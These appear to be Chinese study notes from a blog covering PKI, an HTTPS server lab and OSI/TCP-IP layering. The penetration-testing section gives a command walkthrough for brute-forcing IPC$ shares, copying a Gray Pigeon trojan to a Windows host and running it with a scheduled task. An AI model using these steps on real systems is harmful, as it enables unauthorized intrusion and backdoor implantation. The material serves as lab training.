PKI+简单渗透测试随记

PKI

一、 PKI概述

1、名称

Public Key Infrastructure:公钥基础设施

2、作用

通过加密技术和数字签名保证信息的安全

3、组成

公钥加密技术、数字证书、CA、RA

二、信息安全三要素

机密性

完整性

身份验证/操作的不可否认性

三、哪些IT领域用到PKI:

1、SSL/HTTPS

2、IPsecVPN

3、部分远程访问VPN

四、公钥加密技术

1、作用:实现对信息加密、数字签名等安全保障

2、加密算法:

(1)对称加密算法

​ 加解密的密钥一致!

​ DES 3DES AES

(2)非对称加密算法

通信双方各自产生一对公私钥。

双方各自交换公钥

公钥和私钥为互相加解密关系!

公私钥不可互相逆推!

RSA DH

(3)例如

x+5=y(对称加密算法)

x是原数据/原文

y是密文

5是key/密钥

(4)HASH算法:MD5 SHA (验证完整性)

HASH值不可逆!

HASH值=摘要

(5)数字签名:

用自己的私钥对摘要加密得出的密文就是数字签名

(6)证书:

①证书用于保证公密的合法性

②证书格式遵循X.509标准

③数字证书包含信息:

使用者的公钥值

使用者标识信息(如名称和电子邮件地址)

有效期(证书的有效时间)

颁发者标识信息

颁发者的数字签名

④数字证书由权威公正的第三方机构即CA签发

⑤CA是权威证书颁发机构,为了公正"公钥"的合法性!

⑥机密性:使用对方的公钥加密!

⑦身份验证/数字签名:使用自己的私钥!

五、实验

1、实验名称:部署HTTPS服务器,也叫SSL服务器

2、实验环境:

1)win2008作为https服务器:10.1.1.2/24

2)win7作为客户机:10.1.1.1/24

3)桥接到虚拟网络vmenet1

3、实验步骤:

(1)配置服务器IP地址10.1.1.2/24。

(2)安装IIS服务 并建立一个站点。(必须使用域名)并配置DNS服务器,并初步验证访问http://www.flower.com一下

(3)安装CA组件

(4)打开IIS,先生成证书申请文件

(5)向CA申请证书:

打开网页http://10.1.1.2/certsrv并向CA发送web服务器申请文件

(6)CA颁发证书

(7)在web服务器上下载证书并完成安装

(8)在web服务器上启用SSL443

(9)要求用户必须使用443访问,不能使用80访问!

(10)在客户端上修改hosts文件,并验证

渗透简单测试

一、步骤

0.授权

1.信息收集

nslookup whois

2.扫描漏洞

namp=ip范围 端口 80(IIS,apache,什么网站)scanport

高级扫描:如IIS漏洞2003-IIS6.0 2008IIS7.0

扫描网站漏洞

3.漏洞利用

4.提权(shell环境、桌面环境、最高权限)

5.毁尸灭迹(自首)

6.留后门(跟狱友搞好关系)

7.渗透测试报告(努力立功,争取减刑出狱)

二、手工探测端口号开放

格式:telnet IP地址 探测端口

1.使用 scanport 软件 扫描445端口

2.漏洞利用之IPC$:

进行暴力破解:NTscan(只能针对445端口进行暴力破解)

3.命令

命令:net use \\10.1.1.2\ipc$ 密码 /user:用户名

作用:建立空链接,控制整个电脑的文件,ipc$ 不针对某一个盘,链接之后,目标主机的所有的盘都能在本机使用

net use f: \ \10.1.1.2\share 密码 /user:用户名

作用:将 10.1.1.2\share 共享文件夹映射到本机的 f 盘

net use f: /del

作用:删掉本地的 f 盘映射

net use * /del

作用:删掉所有映射

net use f: \ \10.1.1.2\c$ 密码 /user:用户名

作用:将 10.1.1.2 的 C盘 映射为本机的 f 盘

4.制作木马

利用光盘上的灰鸽子软件

5.植入木马(留后门)

copy d:\heihei.exe \10.1.1.2\c$

作用:将本机的 d:\heihei.exe 拷贝到 10.1.1.2 的 c 盘下

6.设置计划任务自动执行木马

命令:net time \\10.1.1.2

作用:查看对方电脑时间

命令:at \\10.1.1.2 11:11 "c:\heihei.exe"

作用:在对方电脑上定时启动指定应用程序

7.等待肉鸡上线

OSI与TCP-IP5层协议

一、分层思想

1、由通信需求而产生了定义协议标准

2、分层思想的概念

将复杂的流程分解为几个功能相对单一的子过程(将复杂问题简单化)

整个流程更加清晰,复杂问题简单化

更容易发现问题并针对性的解决问题

使用网络的人未必知道数据的传输过程

3、OSI七层模型

(1)通信

(2)协议:通信的双方需要"讲"相同的语言

(3)协议分层:网络通信的过程是开放很复杂的,为通信系了降低复统互联杂性参考

(4)OSI七层模型:1974年,ISO组织发布了OSI参考模型

OSI(Open System interconnection):是开放的通信系统互联参考模型

(5)特点:同层使用相同协议,下层为上层提供服务

二、数据的封装与解封装过程

TCP/UDP 头:包含了源端口号和目标端口号

IP 包头:包含了源IP和目标IP

注:端口号只有应用层才有。

传输层:完成进程到进程的通信

UDP特点:速度快,安全性低,无连接服务

TCP特点:速度慢,安全性高,提供可靠的数据传输(与对方建立连接)

网络层:完成点(电脑)到点(电脑)的通信

交换机工作在数据链路层,而交换机一般不认识IP地址,所以需要加MAC子层,其中包含两个重要的值:源MAC地址和目标MAC地址,这俩值主要就是给交换机看的

FCS:检验前面的数据是否有改变和丢失,是一种校验手段,4个字节

三、OSI模型和TCP/IP模型

7层模型中的 表示层和会话层的协议比较少,直接并到应用层了,就成了 5层模型。

网络层有个非常重要的协议叫 IP 协议。

传输层有个非常重要的协议叫 TCP 协议

数据封装示意图:

8bit = 1Byte字节

注:凡是跟厂家有关系的,都是按照 bit 算的,只有电脑是按照Byte算的。

相关推荐
轩辰~5 分钟前
网络协议入门
linux·服务器·开发语言·网络·arm开发·c++·网络协议
燕雀安知鸿鹄之志哉.23 分钟前
攻防世界 web ics-06
网络·经验分享·安全·web安全·网络安全
wanhengidc44 分钟前
短视频运营行业该如何选择服务器?
运维·服务器
雨中rain1 小时前
Linux -- 从抢票逻辑理解线程互斥
linux·运维·c++
ProcessOn官方账号1 小时前
如何绘制网络拓扑图?附详细分类解说和用户案例!
网络·职场和发展·流程图·拓扑学
-KamMinG1 小时前
Centos7.9安装openldap+phpldapadmin+grafana配置LDAP登录最详细步骤 亲测100%能行
运维·grafana
Bessssss1 小时前
centos日志管理,xiao整理
linux·运维·centos
s_yellowfish1 小时前
Linux服务器pm2 运行chatgpt-on-wechat,搭建微信群ai机器人
linux·服务器·chatgpt
豆是浪个1 小时前
Linux(Centos 7.6)yum源配置
linux·运维·centos
vvw&1 小时前
如何在 Ubuntu 22.04 上安装 Ansible 教程
linux·运维·服务器·ubuntu·开源·ansible·devops